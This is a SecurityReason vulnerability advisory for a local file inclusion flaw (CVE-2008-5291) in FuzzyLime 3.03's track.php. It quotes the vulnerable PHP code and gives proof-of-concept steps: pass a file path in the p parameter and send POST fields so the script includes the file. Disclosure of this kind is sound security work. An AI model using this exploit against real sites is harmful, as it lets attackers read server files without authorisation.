|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 4667 CVE : CVE-2008-5291 CWE : CWE-22 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Given : Yes Credit : Alfons Luja Published : 03.12.2008
Advisory Text : /* --+_---=+--=_____=+++++ -- FuzzyLime 3.03 Local File Iclude PoC *** (-0-) -____======_+++++---'''' ***************************************__________________ -- Vuln - code/track.php $m = $_GET[m]; $p = $_GET[p]; //1 include "settings.inc.php"; if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2 header("Location: ${rooturl}index.php?s=news&p=$p&m=$m"); } else { if(file_exists("../blogs/$p.inc.php")) { //3 include "../blogs/$p.inc.php"; //4 ... 1 $p is not filtered 2 When POST'S is set 3 and file exists 4 we have lfi ---+++++....--___________--============ */ Go to LIVE_HTTP_HEADERS in firefox or opera or whatever set url http://site/path/code/track.php?p=[file] set "SEND POST CONNTENT" url=evil&title=666&excerpt=xd and push reply //Alfons Luja 25.12.2008 References : http://www.securityfocus.com/bid/32475 http://www.milw0rm.com/exploits/7231 http://secunia.com/advisories/32865 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |